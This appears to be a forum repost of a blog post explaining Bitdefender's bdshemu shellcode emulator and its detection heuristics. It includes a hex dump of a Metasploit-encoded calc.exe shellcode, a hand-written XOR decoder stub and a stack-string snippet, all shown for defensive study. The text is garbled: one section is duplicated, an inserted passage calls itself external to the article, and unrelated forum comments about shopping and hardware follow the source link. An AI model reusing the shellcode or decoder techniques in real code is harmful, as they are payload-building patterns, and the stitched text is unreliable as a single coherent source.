Detecting exploits is one of the major strengths of Hypervisor Memory Introspection (HVMI). The ability to monitor guest physical memory pages against different kinds of accesses, such as write or execute, allows HVMI to impose restrictions on critical memory regions: for example, stack or heap pages can be marked as non-executable at the EPT level, so when an exploit manages to gain arbitrary code execution, the introspection logic would step in and block the execution of the shellcode. In theory, intercepting execution attempts from memory regions such as the stack or the heap should be enough to prevent most exploits. Real life is often more complicated, and there are many cases where legit software uses techniques that may resemble an attack - Just In Time compilation (JIT) in browsers is one good example. In addition, an attacker may store their payload in other memory regions, outside the stack or the heap, so a method of discerning good code from bad code is useful. We will talk in this blog post about the Bitdefender Shellcode Emulator, or bdshemu for short. bdshemu is a library capable of emulating basic x86 instructions (in all modes - 16, 32 and 64 bit), while observing shellcode-like behavior. Legitimate code, such as JIT code, will look different compared to a traditional shellcode, so this is what bdshemu is trying to determine: whether the emulated code behaves like a shellcode or not.

bdshemu Overview

bdshemu is a library written in C, and is part of the bddisasm project (and of course, it makes use of bddisasm for instruction decoding). The bdshemu library is built to emulate x86 code only, so it has no support for API calls. In fact, the emulation environment is highly restricted and stripped down, and there are only two memory regions available:

- The page(s) containing the emulated code;
- The stack.

Both of these memory regions are virtualized, meaning that they are in fact copies of the actual memory being emulated, so modifications made to them don't affect the actual system state. Any access made by the emulated code outside of these two areas (which we will call the shellcode and the stack, respectively) will trigger immediate emulation termination. For example, an API call will automatically cause a branch outside the shellcode region, thus terminating emulation. However, in bdshemu, all we care about is the instruction-level behavior of the code, which is enough to tell us whether the code is malicious or not. While bdshemu provides the main infrastructure for detecting shellcodes inside a guest operating system, it is worth noting that this is not the only way HVMI determines that execution of a certain page is malicious - two other important indicators are used:

- The executed page is located on the stack - this is common with stack-based vulnerabilities;
- The stack is pivoted - when a page is first executed and the RSP register points outside the normal stack allocated for the thread.

These two indicators are enough on their own to trigger an exploit detection. If these are not triggered, bdshemu is used to take a good look at the executed code, and decide if it should be blocked or not.

bdshemu Architecture

bdshemu is created as a standalone C library, and it only depends on bddisasm.
Working with bdshemu is fairly simple, as, just like bddisasm, it is a single-API library:

SHEMU_STATUS
ShemuEmulate(
    SHEMU_CONTEXT *Context
    );

The emulator expects a single SHEMU_CONTEXT argument, containing all the information needed in order to emulate the suspicious code. This context is split into two sections - input parameters and output parameters. The input parameters must be supplied by the caller, and they contain information such as the code to be emulated, or initial register values. The output parameters contain information such as what shellcode indicators bdshemu detected. All these fields are well documented in the source code. Initially, the context is filled in with the following main information (please note that the emulation outcome may change depending on the value of the provided registers and stack):

- Input registers, such as segments, general purpose registers, MMX and SSE registers; they can be left 0 if they are not known, or if they are irrelevant;
- Input code, which is the actual code to be emulated;
- Input stack, which can contain actual stack contents, or can be left 0;
- Environment info, such as mode (32 or 64 bit), or ring (0, 1, 2 or 3);
- Control parameters, such as the minimum stack-string length, the minimum NOP sled length or the maximum number of instructions that should be emulated.

The main output parameter is the Flags field, which contains a list of shellcode indicators detected during the emulation. Generally, a non-zero value of this field strongly suggests that the emulated code is, in fact, a shellcode. bdshemu is built as a plain, quick and simple x86 instruction emulator: since it only works with the shellcode itself and a small virtual stack, it doesn't have to emulate any architectural specifics - interrupts or exceptions, descriptor tables, page-tables, etc. In addition, since we only deal with the shellcode and stack memory, bdshemu does not do memory access checks, since it doesn't even allow accesses to other addresses. The only state apart from the registers that can be accessed is the shellcode itself and the stack, and both are copies of the actual memory contents - the system state is never modified during the emulation, only the provided SHEMU_CONTEXT is. This makes bdshemu extremely fast and simple, and lets us focus on its main purpose: detecting shellcodes. As far as instruction support goes, bdshemu supports all the basic x86 instructions, such as branches, arithmetic, logic, shift, bit manipulation, multiplication/division, stack access and data transfer instructions. In addition, it also has support for other instructions, such as some basic MMX or AVX instructions - PUNPCKLBW or VPBROADCAST are two good examples.

bdshemu Detection Techniques

In order to determine whether an emulated piece of code behaves like a shellcode, there are several indicators bdshemu uses.

NOP Sled

This is the classic presentation of shellcodes; since the exact entry point of the shellcode when gaining code execution may be unknown, attackers usually prepend a long sequence of NOP instructions, encoding 0x90. The parameters for the NOP-sled length can be controlled when calling the emulator, via the NopThreshold context field. The default value is SHEMU_DEFAULT_NOP_THRESHOLD, which is 75, meaning that a minimum of 75% of all the emulated instructions must be NOPs.

RIP Load

Shellcodes are designed to work correctly no matter what address they're loaded at.
bdshemu Detection Techniques

In order to determine whether an emulated piece of code behaves like a shellcode, bdshemu uses several indicators.

NOP Sled

This is the classic presentation of shellcodes; since the exact entry point of the shellcode when gaining code execution may be unknown, attackers usually prepend a long sequence of NOP instructions, encoded as 0x90. The NOP-sled length parameter can be controlled when calling the emulator, via the NopThreshold context field. The default value is SHEMU_DEFAULT_NOP_THRESHOLD, which is 75, meaning that at least 75% of all the emulated instructions must be NOPs.

RIP Load

Shellcodes are designed to work correctly no matter what address they're loaded at. This means that the shellcode has to determine, dynamically, at runtime, the address it was loaded at, so absolute addressing can be replaced with some form of relative addressing. This is typically achieved by retrieving the value of the instruction pointer using well-known techniques:

- CALL $+5 / POP ebp - executing these two instructions will result in the value of the instruction pointer being stored in the ebp register; data can then be accessed inside the shellcode using offsets relative to the ebp value;
- FNOP / FNSTENV [esp-0xc] / POP edi - the first instruction is any FPU instruction (not necessarily FNOP), and the second instruction, FNSTENV, saves the FPU environment on the stack; the third instruction retrieves the FPU Instruction Pointer from esp-0xc, which is part of the FPU environment and contains the address of the last FPU instruction executed - in our case, FNOP; from there on, addressing relative to edi can be used to access shellcode data.

Internally, bdshemu keeps track of all the instances of the instruction pointer being saved on the stack. Later loading that instruction pointer from the stack in any way will trigger this detection. Due to the way bdshemu keeps track of the saved instruction pointers, it doesn't matter when, where or how the shellcode attempts to load the RIP into a register and use it - bdshemu will always trigger a detection. In 64 bit mode, RIP-relative addressing can be used directly, since the instruction encoding allows it. Surprisingly, however, a large number of shellcodes still use a classic method of retrieving the instruction pointer (generally the CALL/POP technique), which is somewhat odd, but probably indicates that 32 bit shellcodes were ported to 64 bit with minimal modifications.

Write Self

Most often, shellcodes come in encoded or encrypted forms, in order to avoid certain bad characters (for example, 0x00 in a shellcode that should resemble a string may break the exploit) or to avoid detection by security technologies (for example, AV scanners). This means that at runtime the shellcode must decode itself (usually in place) by modifying its own contents, and then execute the plain-text code. Typical methods of decoding involve XOR- or ADD-based decryption algorithms. bdshemu watches for exactly this kind of behavior and keeps track internally of each modified byte inside the shellcode. Whenever the suspected shellcode writes any portion of itself and then executes it, the self-write detection will be triggered.
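As a concrete, hand-written illustration of the two indicators above (this example is not taken from the article), the tiny 32 bit decoder stub below combines the CALL/POP trick with an in-place XOR loop:

    /* Didactic 32-bit decoder stub: CALL/POP RIP load + in-place XOR decode (self-write).
       The four trailing bytes are 0x90 (NOP) XORed with 0xAA; after the loop finishes,
       execution falls through into the freshly decoded bytes. */
    unsigned char decoder_stub[] = {
        0xE8, 0x00, 0x00, 0x00, 0x00,   /* call $+5         ; pushes the runtime address   */
        0x5E,                           /* pop  esi         ; esi = current address        */
        0x83, 0xC6, 0x0F,               /* add  esi, 0x0F   ; esi -> encoded payload       */
        0xB9, 0x04, 0x00, 0x00, 0x00,   /* mov  ecx, 4      ; payload length               */
        0x80, 0x36, 0xAA,               /* xor  byte [esi], 0xAA ; decode one byte in place */
        0x46,                           /* inc  esi                                          */
        0xE2, 0xFA,                     /* loop back to the xor                              */
        0x3A, 0x3A, 0x3A, 0x3A          /* encoded payload (four NOPs ^ 0xAA)                */
    };

When emulated, the call saves the instruction pointer on the stack and the pop loads it back, which would raise the RIP-load indicator; the xor loop then rewrites bytes that are subsequently executed, which would raise the self-write indicator.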
TIB Access

Once a shellcode has gained code execution, it needs to locate several functions inside various modules in order to carry out its actual payload (for example, downloading a file or creating a process). On Windows, the most common way of doing this is by parsing the user-mode loader structures, in order to locate the addresses where the required modules were loaded, and then locate the needed functions inside these modules. The sequence of structures the shellcode will access is:

- The Thread Environment Block (TEB), which is located at fs:[0] (32 bit thread) or gs:[0] (64 bit thread);
- The Process Environment Block (PEB), which is located at TEB+0x30 (32 bit) or TEB+0x60 (64 bit);
- The loader information (PEB_LDR_DATA), located inside the PEB.

Inside the PEB_LDR_DATA there are several lists which contain the loaded modules. The shellcode will iterate through these lists in order to locate the needed libraries and functions.

On each memory access, bdshemu checks whether the shellcode tries to access the PEB field inside the TEB. bdshemu will keep track of memory accesses even if they are made without the classic fs/gs segment prefixes - as long as an access to the PEB field inside the TEB is identified, the TIB access detection will be triggered.

Direct SYSCALL invocation

Legitimate code relies on several libraries in order to invoke operating system services - for example, in order to create a process, normal code would call one of the CreateProcess functions on Windows. It is uncommon for legitimate code to directly invoke a SYSCALL, since the SYSCALL interface may change over time. For this reason, bdshemu will trigger the SYSCALL detection whenever it sees a suspected shellcode directly invoke a system service using the SYSCALL/SYSENTER/INT instructions.

Stack Strings

Another common way for shellcodes to mask their contents is to dynamically construct strings on the stack. This may eliminate the need to write Position Independent Code (PIC), since the shellcode dynamically builds the desired strings on the stack instead of referencing them inside the shellcode as regular data. A typical way of achieving this is to save the string contents on the stack and then reference the string using the stack pointer:

    push 0x6578652E
    push 0x636C6163

The code above ends up storing the string calc.exe on the stack, which can then be used as a normal string throughout the shellcode. For each value saved on the stack that resembles a string, bdshemu keeps track of the total length of the string constructed on the stack. Once the threshold indicated by the StrLength field inside the context is exceeded, the stack string detection will be triggered. The default value for this field is SHEMU_DEFAULT_STR_THRESHOLD, which is equal to 8, meaning that dynamically constructing a string equal to or longer than 8 characters on the stack will trigger this detection.
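The bookkeeping behind this indicator can be sketched roughly as follows; this is only an illustration of the heuristic as described above, not the actual bdshemu implementation, and the OnStackWrite helper is a hypothetical stand-in for the emulator's store handler:

    /* Illustrative sketch of the stack-string heuristic; not the actual bdshemu code. */
    #include <ctype.h>
    #include <stdbool.h>
    #include <stddef.h>
    #include <stdint.h>

    #define STR_THRESHOLD 8          /* SHEMU_DEFAULT_STR_THRESHOLD */

    static size_t gStackStrLen;      /* length of the printable run built on the stack */

    /* Hypothetical hook, called for every store the emulated code makes to the stack. */
    static bool OnStackWrite(const uint8_t *data, size_t size)
    {
        for (size_t i = 0; i < size; i++) {
            if (isprint(data[i])) {
                if (++gStackStrLen >= STR_THRESHOLD) {
                    return true;     /* raise the stack-string indicator */
                }
            } else {
                gStackStrLen = 0;    /* the printable run was interrupted */
            }
        }
        return false;
    }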
bdshemu Detection Techniques for Kernel-Mode Shellcodes

While the above techniques are general and can be applied to any shellcode, on any operating system and in both 32 and 64 bit mode (except for the TIB access detection, which is Windows specific), bdshemu is also capable of identifying some kernel-specific shellcode behavior.

KPCR Access

The Kernel Processor Control Region (KPCR) is a per-processor structure on Windows systems that contains information critical for the kernel, which may be useful for an attacker as well. Commonly, a shellcode wants to reference the currently executing thread, which can be retrieved by accessing the KPCR structure at offset 0x124 on 32 bit systems and 0x188 on 64 bit systems. Just like the TIB access detection technique, bdshemu keeps track of memory accesses, and when the emulated code reads the current thread from the KPCR, it will trigger the KPCR access detection.

SWAPGS execution

SWAPGS is a system instruction that is only executed when transitioning from user mode to kernel mode and vice versa. Sometimes, due to the specifics of certain kernel exploits, the attacker ends up needing to execute SWAPGS - for example, the EternalBlue kernel payload famously intercepted the SYSCALL handler, so it needed to execute SWAPGS when a SYSCALL took place, just like the ordinary system call handler would do. bdshemu will trigger the SWAPGS detection whenever it encounters the SWAPGS instruction being executed by a suspected shellcode.

MSR read/write

Some shellcodes (such as the aforementioned EternalBlue kernel payload) have to modify the SYSCALL handler in order to migrate to a stable execution environment (for example, because the initial shellcode executes at a high IRQL, which needs to be lowered before calling useful routines). This is done by modifying the SYSCALL MSRs using the WRMSR instruction and then waiting for a syscall to execute (at a lower IRQL) to continue execution (this is also where the SWAPGS technique comes in handy, since SWAPGS must be executed after each SYSCALL on 64 bit). In addition, in order to locate the kernel image in memory and, subsequently, useful kernel routines, a quick and easy technique is to query the SYSCALL MSR (which normally points to the SYSCALL handler inside the kernel image) and then walk pages backwards until the beginning of the kernel image is found. bdshemu will trigger the MSR access detection whenever the suspected shellcode accesses the SYSCALL MSRs (in both 32 and 64 bit mode).

Example

The bdshemu project contains some synthetic test cases, but the best way to demonstrate its functionality is with real-life shellcodes. In this regard, Metasploit is great at generating different kinds of payloads, using all kinds of encoders. Let's take the following shellcode as a purely didactic example:

    DA C8 D9 74 24 F4 5F 8D 7F 4A 89 FD 81 ED FE FF FF FF B9 61 00 00 00 8B 75 00 C1 E6 10 C1 EE 10 83 C5 02 FF 37 5A C1 E2 10 C1 EA 10 89 D3 09 F3 21 F2 F7 D2 21 DA 66 52 66 8F 07 6A 02 03 3C 24 5B 49 85 C9 0F 85 CD FF FF FF 1C B3 E0 5B 62 5B 62 5B 02 D2 E7 E3 27 87 AC D7 9C 5C CE 50 45 02 51 89 23 A1 2C 16 66 30 57 CF FB F3 9A 8F 98 A3 B8 62 77 6F 76 A8 94 5A C6 0D 4D 5F 5D D4 17 E8 9C A4 8D DC 6E 94 6F 45 3E CE 67 EE 66 3D ED 74 F5 97 CF DE 44 EA CF EB 19 DA E6 76 27 B9 2A B8 ED 80 0D F5 FB F6 86 0E BD 73 99 06 7D 5E F6 06 D2 07 01 61 8A 6D C1 E6 99 FA 98 29 13 2D 98 2C 48 A5 0C 81 28 DA 73 BB 2A E1 7B 1E 9B 41 C4 1B 4F 09 A4 84 F9 EE F8 63 7D D1 7D D1 7D 81 15 B0 9E DF 19 20 CC 9B 3C 2E 9E 78 F6 DE 63 63 FE 9C 2B A0 2D DC 27 5C DC BC A9 B9 12 FE 01 8C 6E E6 6E B5 91 60 F2 01 9E 62 B0 07 C8 62 C8 8C

Saving this as a binary file named shellcode.bin and viewing its contents yields a densely packed chunk of code, highly indicative of an encrypted shellcode. Using the disasmtool provided in the bddisasm project, one can use the -shemu option to run the shellcode emulator on the input:
    disasmtool -b32 -shemu -f shellcode.bin

Running this on our shellcode will display step-by-step information about each emulated instruction, but because that trace is long, let's jump directly to the end of it:

    Emulating: 0x0000000000200053 XOR eax, eax
        RAX = 0x0000000000000000 RCX = 0x0000000000000000 RDX = 0x000000000000ee00 RBX = 0x0000000000000002
        RSP = 0x0000000000100fd4 RBP = 0x0000000000100fd4 RSI = 0x0000000000008cc8 RDI = 0x000000000020010c
        R8  = 0x0000000000000000 R9  = 0x0000000000000000 R10 = 0x0000000000000000 R11 = 0x0000000000000000
        R12 = 0x0000000000000000 R13 = 0x0000000000000000 R14 = 0x0000000000000000 R15 = 0x0000000000000000
        RIP = 0x0000000000200055
        RFLAGS = 0x0000000000000246
    Emulating: 0x0000000000200055 MOV edx, dword ptr fs:[eax+0x30]
    Emulation terminated with status 0x00000001, flags: 0xe, 0 NOPs
        SHEMU_FLAG_LOAD_RIP
        SHEMU_FLAG_WRITE_SELF
        SHEMU_FLAG_TIB_ACCESS

We can see that the last emulated instruction is MOV edx, dword ptr fs:[eax+0x30], which is a TEB access instruction, but which also causes emulation to stop, since it is an access outside shellcode memory (and remember, bdshemu stops at the first memory access outside the shellcode or the stack). Moreover, this small shellcode (generated using Metasploit) triggered 3 detections in bdshemu:

- SHEMU_FLAG_LOAD_RIP - the shellcode loads the RIP into a general-purpose register to locate its position in memory;
- SHEMU_FLAG_WRITE_SELF - the shellcode decrypts itself and then executes the decrypted pieces;
- SHEMU_FLAG_TIB_ACCESS - the shellcode goes on to access the PEB, in order to locate important libraries and functions.

These indicators are more than enough to conclude that the emulated code is, without a doubt, a shellcode.

What's even more useful about bdshemu is that, generally, at the end of the emulation, the memory will contain the decrypted form of the shellcode. disasmtool is nice enough to save the shellcode memory once emulation is done - a new file named shellcode.bin_decoded.bin is created, which now contains the decoded shellcode. Looking at the decoded shellcode, one can immediately see not only that it is different, but that it is plain text - a keen eye will quickly spot the calc.exe string at the end of the shellcode, hinting that it is a classic calc.exe-spawning shellcode.

Conclusions

In this blog post we presented the Bitdefender shellcode emulator, a critical part of HVMI's exploit detection technology. bdshemu is built to detect shellcode indicators at the binary-code level, without the need to emulate complex API calls, complex memory layouts or complex architectural entities such as page tables, descriptor tables, etc. - bdshemu focuses on what matters most: emulating the instructions and determining whether they behave like a shellcode. Due to its simplicity, bdshemu works for shellcodes aimed at any operating system, as most of the detection techniques are specific to instruction-level behavior rather than high-level behavior such as API calls. In addition, it works on both 32 and 64 bit code, as well as with user-mode or kernel-mode code.

Source: https://hvmi.github.io/blog/2020/11/11/bdshemu.html
  12. And didn't they bring some money into the budget with this? Or, well, into their own pockets, at least partially.
  13. About the Pfizer/BioNTech vaccine: https://recorder.ro/povestea-primului-vaccin-anti-covid-spusa-de-o-cercetatoare-romanca-din-germania/
  14. I don't know how easy it is to track prices on emag. At one point I was looking at several products and they threw a CAPTCHA at me. I saw a laptop on Black Friday priced at 15000 RON, supposedly reduced from 18000 RON. Today, after Black Friday, it was 14000 RON. Interesting.
  15. Simple in theory, hard to pull off in practice. I read this: https://blog.cloudflare.com/sad-dns-explained/
  16. Was it encrypted? If so, it's more complicated, especially if you don't know the pattern. You can try replacing its display - that is, take its motherboard, hook it up to a working display and hope everything is OK.
  17. Yes, it's odd. When I order from other companies, I check their own website and, if I can, I order from there. Most of the time there's a price difference that would otherwise go to emag.
  18. It costs 5 dollars on DigitalOcean.
  19. Nothing really tempts me, but I have to admit I found several products on emag (ones I had ordered before) discounted. Not by much, but discounted (15%-20%).
  20. Yeah, it doesn't seem like anything special to me: https://s13emagst.akamaized.net/layout/ro/newsletter/2020_11_13_BF_blackout/
  21. I went through my list of past emag orders to see what the products cost now versus what I paid for them. A few are somewhat more expensive, but most are slightly cheaper (which makes sense).
  22. I also looked at various sites and didn't see anything interesting. I mean, a discount of 200 RON off a 1700 RON price, even a genuine one, doesn't seem like a big deal to me. I'd rather pay those 200 RON and have the product arrive the next day, not in 2 weeks. Of the emag products, I can say that that office chair is genuinely discounted, but I haven't tracked other products and have no idea how discounted they really are.
  23. It will be recorded and I will publish the presentations later (in the coming days) on Youtube (probably). I'll probably have to "cut" each presentation so that people can watch them properly, so I don't know if it will work directly in Zoom, since it wouldn't be elegant all lumped together like that.
  24. Minimum 50 posts required for selling/buying.